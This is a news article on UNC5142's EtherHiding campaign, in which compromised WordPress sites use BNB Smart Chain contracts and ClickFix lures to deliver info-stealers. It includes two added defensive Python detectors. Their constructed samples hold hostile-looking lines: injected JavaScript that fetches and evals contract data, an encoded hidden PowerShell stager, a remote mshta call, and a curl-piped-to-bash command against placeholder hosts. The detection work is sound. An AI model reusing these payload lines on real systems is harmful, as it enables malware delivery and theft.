UNC5142’s Campaign Uses Smart Contracts to Deploy Info-Stealers

UNC5142 Threat Actor

A financially motivated threat actor, codenamed UNC5142, abuses blockchain smart contracts to distribute information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, actively targeting both Windows and Apple macOS systems.

“UNC5142 is characterized by its use of compromised WordPress websites and ‘EtherHiding,’ a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News.

By June 2025, Google had already flagged about 14,000 web pages containing injected JavaScript that displayed behavior linked to UNC5142, revealing the group’s indiscriminate targeting of vulnerable WordPress sites. However, the tech giant clarified that it has not detected any UNC5142 activity since July 23, 2025, which may indicate either a pause or an operational pivot.

Researchers first documented EtherHiding in October 2023, when Guardio Labs detailed attacks that delivered malicious code through Binance Smart Chain (BSC) contracts referenced by code injected into infected sites, which displayed fake browser update warnings.

Its Operation

At the core of these attack chains lies a multi-stage JavaScript downloader called CLEARSHORT, which distributes the malware through compromised sites. In the first stage, attackers inject JavaScript malware into websites to retrieve the second-stage payload by interacting with a malicious smart contract stored on the BNB Smart Chain (BSC). They embed the first-stage malware into plugin-related files, theme files, and sometimes even directly into the WordPress database.
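Because the first stage lives in theme files, plugin files, or the WordPress database itself, a defender's first question is how to find it. The following Python scanner is an added example (not code from GTIG or the campaign): it pulls inline script blocks out of PHP templates and wp_posts rows, and weights heuristic indicators of EtherHiding-style code (a BNB Smart Chain RPC endpoint, a web3 provider, a contract read, dynamic execution of the result). The indicator list, weights, and sample content are constructed for illustration.

```python
"""Heuristic scan of WordPress theme/plugin files and wp_posts content for
EtherHiding-style injected JavaScript that reads its next stage from a BNB Smart
Chain contract. Added example for this page; indicators and samples are constructed."""
import re

# (regex, weight). Web3 code is legitimate on many sites, so no single hit is
# conclusive; RPC endpoint + contract read + dynamic execution in one block is what stands out.
INDICATORS = {
    "bsc_rpc":  (re.compile(r"bsc-dataseed\d*\.(?:binance\.org|bnbchain\.org)", re.I), 3),
    "web3_lib": (re.compile(r"\bnew\s+(?:Web3|ethers\.(?:providers\.)?JsonRpcProvider)\s*\(", re.I), 2),
    "eth_call": (re.compile(r"\beth_call\b|\.call\s*\(\s*\{\s*to\s*:", re.I), 2),
    "address":  (re.compile(r"0x[0-9a-fA-F]{40}\b"), 1),
    "dyn_exec": (re.compile(r"\b(?:eval|Function|atob)\s*\(|document\.write\s*\(", re.I), 2),
}
THRESHOLD = 6  # flag a script when its weighted indicator score reaches this value
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def extract_scripts(content, location):
    """JavaScript bodies to inspect: the whole file for .js, inline <script>
    blocks for PHP templates and database rows."""
    return [content] if location.endswith(".js") else SCRIPT_RE.findall(content)

def score_script(js):
    """Weighted indicator score for one script body and the indicator names that hit."""
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(js))
    return sum(INDICATORS[h][1] for h in hits), hits

def scan_sources(sources):
    """sources: {location: content}; locations are file paths or 'wp_posts:<ID>'.
    Returns [(location, score, hits)] for every script scoring >= THRESHOLD."""
    findings = []
    for location, content in sources.items():
        for js in extract_scripts(content, location):
            score, hits = score_script(js)
            if score >= THRESHOLD:
                findings.append((location, score, hits))
    return findings

# Constructed samples: a clean template, an injected template, an injected post row.
SAMPLES = {
    "wp-content/themes/site/header.php":
        "<script src='jquery.min.js'></script><script>jQuery(init);</script>",
    "wp-content/themes/site/footer.php":
        "<script>const p=new ethers.JsonRpcProvider('https://bsc-dataseed.binance.org/');"
        "p.call({to:'0x0000000000000000000000000000000000000000',data:'0x'})"
        ".then(r=>eval(atob(r.slice(2))));</script>",
    "wp_posts:1337":
        "<p>Hello</p><script>fetch('https://bsc-dataseed1.bnbchain.org/',{method:'POST',"
        "body:JSON.stringify({method:'eth_call'})}).then(r=>r.text()).then(t=>new Function(t)());</script>",
}
```

Running `scan_sources(SAMPLES)` flags footer.php and the post row but not header.php; on a real site, feed it the output of a file walk over wp-content plus a `SELECT ID, post_content FROM wp_posts` export.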

The smart contract in turn points to a CLEARSHORT landing page fetched from an external server. This page employs the ClickFix social engineering tactic to trick victims into running malicious commands via the Windows Run dialog or the Terminal app on macOS, ultimately infecting the system with stealer malware. As of December 2024, these landing pages—typically hosted on a Cloudflare .dev domain—arrive in an encrypted format.


CLEARSHORT infection chain

On Windows systems, the malicious command executes an HTML Application (HTA) file downloaded from a MediaFire URL. That file then drops a PowerShell script designed to bypass defenses, fetch the encrypted final payload from GitHub, MediaFire, or the group’s own infrastructure, and run the stealer directly in memory without leaving any trace on disk.

In macOS attacks observed in February and April 2025, the attackers used ClickFix decoys to prompt users to execute a bash command in Terminal. This command retrieved a shell script that employed curl to download the Atomic Stealer payload from a remote server.
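Both execution chains above (Run dialog to mshta.exe to an in-memory PowerShell stager on Windows; a Terminal-launched shell piping curl output into an interpreter on macOS) leave a distinctive parent-child footprint in process-creation telemetry. The following Python is an added example, not from the GTIG report: it walks a process tree and flags each step of either chain. Field names mirror Sysmon/EDR schemas but the events are constructed, and the URLs are placeholders.

```python
"""Flag ClickFix execution chains in process-creation telemetry. Added example for
this page; field names mirror Sysmon/EDR schemas, all events below are constructed."""
import re

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# Flags/cmdlets typical of a PowerShell stager that fetches and runs a payload in memory.
PS_STAGER_RE = re.compile(r"(?i)-(?:enc|w\s+hidden|ep\s+bypass|nop)\b|\b(?:iex|invoke-expression|downloadstring|iwr)\b")
# curl/wget output piped straight into a shell interpreter.
MAC_PIPE_RE = re.compile(r"(?i)\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|z)?sh\b")

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def ancestor_images(event, by_pid, depth=5):
    names = []  # image basenames of parent, grandparent, ... (nearest first)
    while event is not None and depth > 0:
        event, depth = by_pid.get(event["ppid"]), depth - 1
        if event is not None:
            names.append(basename(event["image"]))
    return names

def detect_clickfix(events):
    """Return [(pid, rule)] for each process that matches a ClickFix chain step."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd, anc = basename(e["image"]), e["cmdline"], ancestor_images(e, by_pid)
        parent = anc[0] if anc else ""
        # Windows: Run dialog (hosted by explorer.exe) launching mshta.exe on a remote HTA
        if img == "mshta.exe" and parent == "explorer.exe" and URL_RE.search(cmd):
            findings.append((e["pid"], "run_dialog_remote_hta"))
        # Windows: the HTA dropping a PowerShell stager
        elif img in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe" and PS_STAGER_RE.search(cmd):
            findings.append((e["pid"], "hta_spawns_powershell_stager"))
        # macOS: a shell somewhere under Terminal (login/zsh in between) piping curl into an interpreter
        elif img in ("bash", "sh", "zsh") and "terminal" in anc and MAC_PIPE_RE.search(cmd):
            findings.append((e["pid"], "terminal_curl_pipe_sh"))
    return findings

def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}

# Constructed telemetry: a Windows chain, a benign sibling process, and a macOS chain.
EVENTS = [
    ev(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ev(101, 100, r"C:\Windows\System32\mshta.exe", "mshta https://files.example/PLACEHOLDER/verify.hta"),
    ev(102, 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "powershell -w hidden -ep bypass -enc SQBFAFgAIAAuAC4ALgA="),
    ev(103, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ev(200, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "Terminal"),
    ev(201, 200, "/usr/bin/login", "login -pf user"),
    ev(202, 201, "/bin/zsh", "-zsh"),
    ev(203, 202, "/bin/bash", "bash -c 'curl -fsSL https://files.example/PLACEHOLDER/inst.sh | bash'"),
]
```

`detect_clickfix(EVENTS)` returns the three chain steps (pids 101, 102, 203) and nothing for explorer.exe, notepad.exe, or the interactive shells; the ancestor walk is what lets the macOS rule see Terminal through the login and zsh layers in between.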


UNC5142 final payload distribution over time

ClearFake Variant

Researchers assess CLEARSHORT as a variant of ClearFake, which Sekoia analyzed extensively in March 2025. ClearFake, a rogue JavaScript framework active since July 2023, infects compromised websites to deliver malware through drive-by downloads. Around May 2024, the attacks began integrating the ClickFix method.

The abuse of blockchain technology gives UNC5142 several advantages. This clever approach blends seamlessly with legitimate Web3 activity and enhances the group’s resilience against detection and takedown efforts.

Over the past year, Google observed significant evolution in UNC5142’s campaigns. The group shifted from a single-contract system to a more sophisticated three-smart-contract architecture starting in November 2024 to gain greater operational agility, followed by further refinements in January 2025.

“This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make their contracts upgradable,” GTIG explained.

“The setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job. This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites. As a result, the campaigns are much more agile and resistant to takedowns.”

UNC5142 achieves this flexibility by exploiting the mutable nature of a smart contract’s data—since the program code itself remains immutable once deployed—to modify payload URLs. Each update costs the attackers between $0.25 and $1.50 in network fees.

Further investigation revealed that UNC5142 operates two distinct smart contract infrastructures to deliver stealer malware via the CLEARSHORT downloader. The Main infrastructure, created on November 24, 2024, serves as the core campaign system, while the Secondary infrastructure, funded on February 18, 2025, supports parallel operations.

“The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates,” GTIG said. “The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.”

“Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.”

 


Source: TheHackerNews

Read more at Impreza News
